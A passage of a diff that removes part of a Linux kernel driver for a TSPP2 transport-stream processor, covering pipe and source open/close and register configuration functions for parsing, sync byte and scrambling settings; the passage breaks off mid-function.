--
--		ion_free(pipe->cfg.ion_client, pipe->desc_ion_handle);
--	}
--init_sps_failed_free_endpoint:
--	sps_free_endpoint(pipe->sps_pipe);
--
--	return ret;
--}
--
--/**
-- * tspp2_sps_queue_descriptors() - Queue BAM SPS descriptors
-- *
-- * @pipe:	The pipe to work on.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_sps_queue_descriptors(struct tspp2_pipe *pipe)
--{
--	int ret = 0;
--	u32 data_offset = 0;
--	u32 desc_length = pipe->cfg.sps_cfg.descriptor_size;
--	u32 desc_flags = pipe->cfg.sps_cfg.descriptor_flags;
--	u32 data_length = pipe->cfg.buffer_size;
--
--	while (data_length > 0) {
--		ret = sps_transfer_one(pipe->sps_pipe,
--				pipe->iova + data_offset,
--				desc_length,
--				pipe->cfg.sps_cfg.user_info,
--				desc_flags);
--
--		if (ret) {
--			pr_err("%s: sps_transfer_one failed, %d\n",
--				__func__, ret);
--			return ret;
--		}
--
--		data_offset += desc_length;
--		data_length -= desc_length;
--	}
--
--	return 0;
--}
--
--/**
-- * tspp2_sps_pipe_terminate() - Disconnect and terminate SPS BAM pipe
-- *
-- * @pipe:	The pipe to work on.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_sps_pipe_terminate(struct tspp2_pipe *pipe)
--{
--	int ret;
--
--	ret = sps_disconnect(pipe->sps_pipe);
--	if (ret) {
--		pr_err("%s: failed to disconnect BAM pipe, %d\n",
--			__func__, ret);
--		return ret;
--	}
--	if (tspp2_iommu_bypass) {
--		dma_free_coherent(NULL, pipe->sps_connect_cfg.desc.size,
--					pipe->sps_connect_cfg.desc.base,
--					pipe->sps_connect_cfg.desc.phys_base);
--	} else {
--		ion_unmap_kernel(pipe->cfg.ion_client,
--				pipe->desc_ion_handle);
--
--		ion_unmap_iommu(pipe->cfg.ion_client,
--				pipe->desc_ion_handle,
--				pipe->device->iommu_info.hlos_domain_num,
--				pipe->device->iommu_info.hlos_partition);
--
--		ion_free(pipe->cfg.ion_client, pipe->desc_ion_handle);
--	}
--	pipe->sps_connect_cfg.desc.base = NULL;
--
--	ret = sps_free_endpoint(pipe->sps_pipe);
--	if (ret) {
--		pr_err("%s: failed to release BAM end-point, %d\n",
--			__func__, ret);
--		return ret;
--	}
--
--	return 0;
--}
--
--/**
-- * tspp2_pipe_open() - Open a pipe for use.
-- *
-- * @dev_id:		TSPP2 device ID.
-- * @cfg:		Pipe configuration parameters.
-- * @iova:		TSPP2 IOMMU virtual address of the pipe's buffer.
-- * @pipe_handle:	Opened pipe handle.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_pipe_open(u32 dev_id,
--			const struct tspp2_pipe_config_params *cfg,
--			ion_phys_addr_t *iova,
--			u32 *pipe_handle)
--{
--	struct tspp2_device *device;
--	struct tspp2_pipe *pipe;
--	int i;
--	int ret = 0;
--
--	if (dev_id >= TSPP2_NUM_DEVICES) {
--		pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
--		return -ENODEV;
--	}
--
--	if (!cfg || !iova || !pipe_handle) {
--		pr_err("%s: Invalid parameters\n", __func__);
--		return -EINVAL;
--	}
--
--	/* Some minimal sanity tests on the pipe configuration: */
--	if (!cfg->ion_client || !cfg->buffer_handle) {
--		pr_err("%s: Invalid parameters\n", __func__);
--		return -EINVAL;
--	}
--
--	device = tspp2_devices[dev_id];
--	if (!device) {
--		pr_err("%s: Invalid device\n", __func__);
--		return -ENODEV;
--	}
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&device->mutex)) {
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EPERM;
--	}
--
--	/* Find a free pipe */
--	for (i = 0; i < TSPP2_NUM_PIPES; i++) {
--		pipe = &device->pipes[i];
--		if (!pipe->opened)
--			break;
--	}
--	if (i == TSPP2_NUM_PIPES) {
--		pr_err("%s: No available pipes\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -ENOMEM;
--	}
--
--	pipe->hw_index = i;
--	/* Actual pipe threshold is set when the pipe is attached to a source */
--	pipe->threshold = 0;
--	pipe->cfg = *cfg;
--	pipe->ref_cnt = 0;
--	/* device back-pointer is already initialized, always remains valid */
--
--	ret = tspp2_pipe_memory_init(pipe);
--	if (ret) {
--		pr_err("%s: Error initializing pipe memory\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return ret;
--	}
--	ret = tspp2_sps_pipe_init(pipe);
--	if (ret) {
--		pr_err("%s: Error initializing BAM pipe\n", __func__);
--		tspp2_pipe_memory_terminate(pipe);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return ret;
--	}
--
--	/* For output pipes, we queue BAM descriptors here so they are ready */
--	if (pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_OUTPUT) {
--		ret = tspp2_sps_queue_descriptors(pipe);
--		if (ret) {
--			pr_err("%s: Error queuing BAM pipe descriptors\n",
--				__func__);
--			tspp2_sps_pipe_terminate(pipe);
--			tspp2_pipe_memory_terminate(pipe);
--			mutex_unlock(&device->mutex);
--			pm_runtime_mark_last_busy(device->dev);
--			pm_runtime_put_autosuspend(device->dev);
--			return ret;
--		}
--	}
--
--	/* Reset counter */
--	writel_relaxed((0x1 << pipe->hw_index),
--		device->base + TSPP2_DATA_NOT_SENT_ON_PIPE_RESET);
--
--	/* Return handle to the caller */
--	*pipe_handle = (u32)pipe;
--	*iova = pipe->iova;
--
--	pipe->opened = 1;
--	if (pipe->cfg.is_secure)
--		device->num_secured_opened_pipes++;
--	else
--		device->num_non_secured_opened_pipes++;
--
--	mutex_unlock(&device->mutex);
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_pipe_open);
--
--/**
-- * tspp2_pipe_close() - Close an opened pipe.
-- *
-- * @pipe_handle:	Pipe to be closed.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_pipe_close(u32 pipe_handle)
--{
--	int ret;
--	struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
--
--	if (!pipe) {
--		pr_err("%s: Invalid pipe handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(pipe->device->dev);
--	if (ret < 0)
--		return ret;
--
--	mutex_lock(&pipe->device->mutex);
--
--	if (!pipe->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&pipe->device->mutex);
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -EPERM;
--	}
--
--	if (!pipe->opened) {
--		pr_err("%s: Pipe already closed\n", __func__);
--		mutex_unlock(&pipe->device->mutex);
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -EINVAL;
--	}
--
--	if (pipe->ref_cnt > 0) {
--		pr_err("%s: Pipe %u is still attached to a source\n",
--			__func__, pipe_handle);
--		mutex_unlock(&pipe->device->mutex);
--		pm_runtime_mark_last_busy(pipe->device->dev);
--		pm_runtime_put_autosuspend(pipe->device->dev);
--		return -EPERM;
--	}
--
--	/*
--	 * Note: need to decrement the pipe reference count here, before
--	 * calling tspp2_pipe_memory_terminate().
--	 */
--	if (pipe->cfg.is_secure)
--		pipe->device->num_secured_opened_pipes--;
--	else
--		pipe->device->num_non_secured_opened_pipes--;
--
--	tspp2_sps_pipe_terminate(pipe);
--	tspp2_pipe_memory_terminate(pipe);
--
--	pipe->iova = 0;
--	pipe->opened = 0;
--
--	mutex_unlock(&pipe->device->mutex);
--
--	pm_runtime_mark_last_busy(pipe->device->dev);
--	pm_runtime_put_autosuspend(pipe->device->dev);
--
--	dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_pipe_close);
--
--/* Source API functions */
--
--/**
-- * tspp2_src_open() - Open a new source for use.
-- *
-- * @dev_id:	TSPP2 device ID.
-- * @cfg:	Source configuration parameters.
-- * @src_handle:	Opened source handle.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_open(u32 dev_id,
--			struct tspp2_src_cfg *cfg,
--			u32 *src_handle)
--{
--	int ret;
--	int i;
--	struct tspp2_device *device;
--	struct tspp2_src *src;
--	enum tspp2_src_input input;
--
--	if (dev_id >= TSPP2_NUM_DEVICES) {
--		pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
--		return -ENODEV;
--	}
--	if (!src_handle) {
--		pr_err("%s: Invalid source handle pointer\n", __func__);
--		return -EINVAL;
--	}
--	if (!cfg) {
--		pr_err("%s: Invalid configuration parameters\n", __func__);
--		return -EINVAL;
--	}
--
--	device = tspp2_devices[dev_id];
--	if (!device) {
--		pr_err("%s: Invalid device\n", __func__);
--		return -ENODEV;
--	}
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&device->mutex)) {
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EPERM;
--	}
--
--	input = cfg->input;
--	if ((input == TSPP2_INPUT_TSIF0) || (input == TSPP2_INPUT_TSIF1)) {
--		/* Input from TSIF */
--		if (device->tsif_sources[input].opened) {
--			pr_err("%s: TSIF input %d already opened\n",
--				__func__, input);
--			mutex_unlock(&device->mutex);
--			pm_runtime_mark_last_busy(device->dev);
--			pm_runtime_put_autosuspend(device->dev);
--			return -EINVAL;
--		}
--		src = &device->tsif_sources[input];
--
--		/*
--		 * When writing to HW registers that are relevant to sources
--		 * of both TSIF and memory input types, the register offsets
--		 * for the TSIF-related registers come after the memory-related
--		 * registers. For example: for TSPP2_SRC_CONFIG(n), n=[0..9],
--		 * indexes 0..7 are for memory inputs, and indexes 8, 9 are
--		 * for TSIF inputs.
--		 */
--		src->hw_index = TSPP2_NUM_MEM_INPUTS + input;
--
--		/* Save TSIF source parameters in TSIF device */
--		device->tsif_devices[input].mode =
--			cfg->params.tsif_params.tsif_mode;
--		device->tsif_devices[input].clock_inverse =
--			cfg->params.tsif_params.clock_inverse;
--		device->tsif_devices[input].data_inverse =
--			cfg->params.tsif_params.data_inverse;
--		device->tsif_devices[input].sync_inverse =
--			cfg->params.tsif_params.sync_inverse;
--		device->tsif_devices[input].enable_inverse =
--			cfg->params.tsif_params.enable_inverse;
--	} else {
--		/* Input from memory */
--		for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) {
--			if (!device->mem_sources[i].opened)
--				break;
--		}
--		if (i == TSPP2_NUM_MEM_INPUTS) {
--			pr_err("%s: No memory inputs available\n", __func__);
--			mutex_unlock(&device->mutex);
--			pm_runtime_mark_last_busy(device->dev);
--			pm_runtime_put_autosuspend(device->dev);
--			return -ENOMEM;
--		}
--
--		src = &device->mem_sources[i];
--		src->hw_index = i;
--	}
--
--	src->opened = 1;
--	src->input = input;
--	src->pkt_format = TSPP2_PACKET_FORMAT_188_RAW; /* default value */
--	src->scrambling_bits_monitoring = TSPP2_SRC_SCRAMBLING_MONITOR_NONE;
--	INIT_LIST_HEAD(&src->batches_list);
--	INIT_LIST_HEAD(&src->filters_list);
--	src->input_pipe = NULL;
--	INIT_LIST_HEAD(&src->output_pipe_list);
--	src->num_associated_batches = 0;
--	src->num_associated_pipes = 0;
--	src->num_associated_filters = 0;
--	src->reserved_filter_hw_index = 0;
--	src->event_callback = NULL;
--	src->event_cookie = NULL;
--	src->event_bitmask = 0;
--	src->enabled = 0;
--	/* device back-pointer is already initialized, always remains valid */
--
--	/* Reset source-related registers */
--	if ((input == TSPP2_INPUT_TSIF0) || (input == TSPP2_INPUT_TSIF1)) {
--		writel_relaxed((0x1 << TSIF_INPUT_SRC_CONFIG_16_BATCHES_OFFS),
--			device->base +
--			TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
--	} else {
--		/*
--		 * Disable memory inputs. Set mode of operation to 16 batches.
--		 * Configure last batch to be associated with this source.
--		 */
--		writel_relaxed(TSPP2_DEFAULT_MEM_SRC_CONFIG,
--			device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--	}
--	writel_relaxed(0, device->base +
--				TSPP2_SRC_DEST_PIPES(src->hw_index));
--	writel_relaxed(TSPP2_DEFAULT_SRC_CONFIG, device->base +
--				TSPP2_SRC_CONFIG(src->hw_index));
--	writel_relaxed((0x1 << src->hw_index),
--		device->base + TSPP2_SRC_TOTAL_TSP_RESET);
--	writel_relaxed((0x1 << src->hw_index),
--		device->base + TSPP2_SRC_FILTERED_OUT_TSP_RESET);
--
--	/* Return handle to the caller */
--	*src_handle = (u32)src;
--
--	mutex_unlock(&device->mutex);
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_open);
--
--/**
-- * tspp2_src_close() - Close an opened source.
-- *
-- * @src_handle:	Source to be closed.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_close(u32 src_handle)
--{
--	unsigned long flags;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	mutex_lock(&src->device->mutex);
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source already closed\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		return -EINVAL;
--	}
--
--	if (src->enabled) {
--		pr_err("%s: Source needs to be disabled before it can be closed\n",
--			__func__);
--		mutex_unlock(&src->device->mutex);
--		return -EPERM;
--	}
--
--	/* Verify resources have been released by the caller */
--	if ((src->num_associated_batches > 0) ||
--		(src->num_associated_pipes > 0) ||
--		(src->num_associated_filters > 0)) {
--		pr_err("%s: Source's resources need to be removed before it can be closed\n",
--			__func__);
--		mutex_unlock(&src->device->mutex);
--		return -EPERM;
--	}
--
--	/*
--	 * Most fields are reset to default values when opening a source, so
--	 * there is no need to reset them all here. We only need to mark the
--	 * source as closed.
--	 */
--	src->opened = 0;
--	spin_lock_irqsave(&src->device->spinlock, flags);
--	src->event_callback = NULL;
--	src->event_cookie = NULL;
--	src->event_bitmask = 0;
--	spin_unlock_irqrestore(&src->device->spinlock, flags);
--	src->enabled = 0;
--
--	/*
--	 * Source-related HW registers are reset when opening a source, so
--	 * we don't reser them here. Note that a source is disabled before
--	 * it is closed, so no need to disable it here either.
--	 */
--
--	mutex_unlock(&src->device->mutex);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_close);
--
--/**
-- * tspp2_src_parsing_option_set() - Set source parsing configuration option.
-- *
-- * @src_handle:	Source to configure.
-- * @option:	Parsing configuration option to enable / disable.
-- * @enable:	Enable / disable option.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_parsing_option_set(u32 src_handle,
--			enum tspp2_src_parsing_option option,
--			int enable)
--{
--	int ret;
--	u32 reg = 0;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	reg = readl_relaxed(src->device->base +
--			TSPP2_SRC_CONFIG(src->hw_index));
--
--	switch (option) {
--	case TSPP2_SRC_PARSING_OPT_CHECK_CONTINUITY:
--		if (enable)
--			reg |= (0x1 << SRC_CONFIG_CHECK_CONT_OFFS);
--		else
--			reg &= ~(0x1 << SRC_CONFIG_CHECK_CONT_OFFS);
--		break;
--	case TSPP2_SRC_PARSING_OPT_IGNORE_DISCONTINUITY:
--		if (enable)
--			reg |= (0x1 << SRC_CONFIG_IGNORE_DISCONT_OFFS);
--		else
--			reg &= ~(0x1 << SRC_CONFIG_IGNORE_DISCONT_OFFS);
--		break;
--	case TSPP2_SRC_PARSING_OPT_ASSUME_DUPLICATE_PACKETS:
--		if (enable)
--			reg |= (0x1 << SRC_CONFIG_ASSUME_DUPLICATES_OFFS);
--		else
--			reg &= ~(0x1 << SRC_CONFIG_ASSUME_DUPLICATES_OFFS);
--		break;
--	case TSPP2_SRC_PARSING_OPT_DISCARD_INVALID_AF_PACKETS:
--		if (enable)
--			reg |= (0x1 << SRC_CONFIG_DISCARD_INVALID_AF_OFFS);
--		else
--			reg &= ~(0x1 << SRC_CONFIG_DISCARD_INVALID_AF_OFFS);
--		break;
--	case TSPP2_SRC_PARSING_OPT_VERIFY_PES_START:
--		if (enable)
--			reg |= (0x1 << SRC_CONFIG_VERIFY_PES_START_OFFS);
--		else
--			reg &= ~(0x1 << SRC_CONFIG_VERIFY_PES_START_OFFS);
--		break;
--	default:
--		pr_err("%s: Invalid option %d\n", __func__, option);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	writel_relaxed(reg, src->device->base +
--			TSPP2_SRC_CONFIG(src->hw_index));
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_parsing_option_set);
--
--/**
-- * tspp2_src_parsing_option_get() - Get source parsing configuration option.
-- *
-- * @src_handle:	Source handle.
-- * @option:	Parsing configuration option to get.
-- * @enable:	Option's enable / disable indication.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_parsing_option_get(u32 src_handle,
--			enum tspp2_src_parsing_option option,
--			int *enable)
--{
--	int ret;
--	u32 reg = 0;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--	if (!enable) {
--		pr_err("%s: NULL pointer\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	reg = readl_relaxed(src->device->base +
--			TSPP2_SRC_CONFIG(src->hw_index));
--
--	switch (option) {
--	case TSPP2_SRC_PARSING_OPT_CHECK_CONTINUITY:
--		*enable = ((reg >> SRC_CONFIG_CHECK_CONT_OFFS) & 0x1);
--		break;
--	case TSPP2_SRC_PARSING_OPT_IGNORE_DISCONTINUITY:
--		*enable = ((reg >> SRC_CONFIG_IGNORE_DISCONT_OFFS) & 0x1);
--		break;
--	case TSPP2_SRC_PARSING_OPT_ASSUME_DUPLICATE_PACKETS:
--		*enable = ((reg >> SRC_CONFIG_ASSUME_DUPLICATES_OFFS) & 0x1);
--		break;
--	case TSPP2_SRC_PARSING_OPT_DISCARD_INVALID_AF_PACKETS:
--		*enable = ((reg >> SRC_CONFIG_DISCARD_INVALID_AF_OFFS) & 0x1);
--		break;
--	case TSPP2_SRC_PARSING_OPT_VERIFY_PES_START:
--		*enable = ((reg >> SRC_CONFIG_VERIFY_PES_START_OFFS) & 0x1);
--		break;
--	default:
--		pr_err("%s: Invalid option %d\n", __func__, option);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_parsing_option_get);
--
--/**
-- * tspp2_src_sync_byte_config_set() - Set source sync byte configuration.
-- *
-- * @src_handle:		Source to configure.
-- * @check_sync_byte:	Check TS packet sync byte.
-- * @sync_byte_value:	Sync byte value to check (e.g., 0x47).
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_sync_byte_config_set(u32 src_handle,
--			int check_sync_byte,
--			u8 sync_byte_value)
--{
--	int ret;
--	u32 reg = 0;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	reg = readl_relaxed(src->device->base +
--			TSPP2_SRC_CONFIG(src->hw_index));
--
--	if (check_sync_byte)
--		reg |= (0x1 << SRC_CONFIG_CHECK_SYNC_OFFS);
--	else
--		reg &= ~(0x1 << SRC_CONFIG_CHECK_SYNC_OFFS);
--
--	reg &= ~(0xFF << SRC_CONFIG_SYNC_BYTE_OFFS);
--	reg |= (sync_byte_value << SRC_CONFIG_SYNC_BYTE_OFFS);
--
--	writel_relaxed(reg, src->device->base +
--			TSPP2_SRC_CONFIG(src->hw_index));
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_sync_byte_config_set);
--
--/**
-- * tspp2_src_sync_byte_config_get() - Get source sync byte configuration.
-- *
-- * @src_handle:		Source handle.
-- * @check_sync_byte:	Check TS packet sync byte indication.
-- * @sync_byte_value:	Sync byte value.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_sync_byte_config_get(u32 src_handle,
--			int *check_sync_byte,
--			u8 *sync_byte_value)
--{
--	int ret;
--	u32 reg = 0;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--	if (!check_sync_byte || !sync_byte_value) {
--		pr_err("%s: NULL pointer\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	reg = readl_relaxed(src->device->base +
--			TSPP2_SRC_CONFIG(src->hw_index));
--
--	*check_sync_byte = (reg >> SRC_CONFIG_CHECK_SYNC_OFFS) & 0x1;
--	*sync_byte_value = (reg >> SRC_CONFIG_SYNC_BYTE_OFFS) & 0xFF;
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_sync_byte_config_get);
--
--/**
-- * tspp2_src_scrambling_config_set() - Set source scrambling configuration.
-- *
-- * @src_handle:	Source to configure.
-- * @cfg:	Scrambling configuration to set.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_scrambling_config_set(u32 src_handle,
--			const struct tspp2_src_scrambling_config *cfg)
--{
--	int ret;
--	u32 reg = 0;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--	if (!cfg) {
--		pr_err("%s: NULL pointer\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	reg = readl_relaxed(src->device->base +
--			TSPP2_SRC_CONFIG(src->hw_index));
--
--	/* Clear all scrambling configuration bits before setting them */
--	reg &= ~(0x3 << SRC_CONFIG_SCRAMBLING0_OFFS);
--	reg &= ~(0x3 << SRC_CONFIG_SCRAMBLING1_OFFS);
--	reg &= ~(0x3 << SRC_CONFIG_SCRAMBLING2_OFFS);
--	reg &= ~(0x3 << SRC_CONFIG_SCRAMBLING3_OFFS);
--	reg &= ~(0x3 << SRC_CONFIG_SCRAMBLING_MONITOR_OFFS);
--
--	reg |= (cfg->scrambling_0_ctrl << SRC_CONFIG_SCRAMBLING0_OFFS);
--	reg |= (cfg->scrambling_1_ctrl << SRC_CONFIG_SCRAMBLING1_OFFS);
--	reg |= (cfg->scrambling_2_ctrl << SRC_CONFIG_SCRAMBLING2_OFFS);
--	reg |= (cfg->scrambling_3_ctrl << SRC_CONFIG_SCRAMBLING3_OFFS);
--	reg |= (cfg->scrambling_bits_monitoring <<
--					SRC_CONFIG_SCRAMBLING_MONITOR_OFFS);
--
--	writel_relaxed(reg, src->device->base +
--			TSPP2_SRC_CONFIG(src->hw_index));
--
--	src->scrambling_bits_monitoring = cfg->scrambling_bits_monitoring;
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_scrambling_config_set);
--
--/**
-- * tspp2_src_scrambling_config_get() - Get source scrambling configuration.
-- *
-- * @src_handle:	Source handle.
-- * @cfg:	Scrambling configuration.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_scrambling_config_get(u32 src_handle,
--			struct tspp2_src_scrambling_config *cfg)
--{
--	int ret;
--	u32 reg = 0;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
